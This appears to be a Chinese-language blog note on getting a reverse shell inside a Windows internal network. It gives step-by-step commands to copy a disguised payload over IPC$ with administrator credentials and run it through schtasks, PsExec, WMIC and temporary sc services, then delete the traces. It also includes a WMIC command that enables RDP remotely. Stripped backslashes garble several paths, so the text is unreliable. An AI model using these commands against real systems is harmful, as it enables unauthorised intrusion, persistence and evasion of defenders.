win內網中利用ipc彈shell 小記

最新 08-21

0x01 首先,想辦法把馬拷到目標機器上再說:

1、# net use \192.168.3.168ipc$ /user:administrator "admin!@#45"

2、# copy shell.exe \192.168.3.168c$windows empplugin_update.exe

0x02 利用最常規的copy[xcopy] & schtasks(按說ipc建立以後,schtasks就不用帶賬號密碼了,尤其我這裡還是以system許可權運行[本身就不需要賬號密碼],但實際測試中不帶就拒絕訪問,至於具體原因,暫未知,保險起見還是帶上):

1、 # schtasks /create /tn "plugin_update" /tr c:windows empplugin_update.exe /sc once /st 10:29 /S 192.168.3.168 /RU System /u administrator /p "admin!@#45"

2、# schtasks /run /tn "plugin_update" /S 192.168.3.168 /u administrator /p "admin!@#45" 你也可以不用等,讓目標立即運行任務

3、# schtasks /F /delete /tn "plugin_update" /S 192.168.3.168 /u administrator /p "admin!@#45"

0x03 通過古老的psexec的方式(對方admin$開啟即可,簡單粗暴,退出的時候[如果你是用的交互]也許會有服務殘留,實際測試中並沒有,種馬的時候注意不要交互,不然進程會一直掛在哪裡)

1、# PsExec.exe -accepteula \192.168.3.36 -d -u administrator -p admin c:windows empplugin_update.exe

0x04 通過wmic的方式來遠程執行任意指令[ 典型工具 winexec ]:

1、 # wmic /node:192.168.3.168 /user:administrator /password:admin!@#45 process call create "c:windows empplugin_update.exe"

2、# wmic /node:192.168.3.36 /USER:administrator /password:admin PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1 遠程開啟對方rdp,08以後的系統可能不太好使

0x05 通過sc創建臨時服務的方式(記得事先建立好連接,可能需要把exe,bat先註冊一下,不然會一直報1053錯誤(哪位兄弟如果知道怎麼更好的解決,還望能告訴小弟一聲,感激不盡),但,其實也並不影響,雖然服務報錯,但馬還是會照常執行(記得shel彈回來以後馬上遷徙shell進程,動作要快,不然很快就會斷掉,具體原因暫未知),只要shell彈回來就好,用完就順手刪掉即可,關於sc的更多選項請自行查看工具使用幫助):

1、# net use \192.168.3.168ipc$ /user:administrator "admin!@#45"

2、# sc \192.168.3.168 create "patch_update" binpath= "cmd /c

3、c:windows empplugin_update.exe" 這裡注意下等號後面的空格別漏了

4、# sc \192.168.3.168 start "patch_update"

5、# sc \192.168.3.168 delete "patch_update"# net use \192.168.3.168ipc$ /del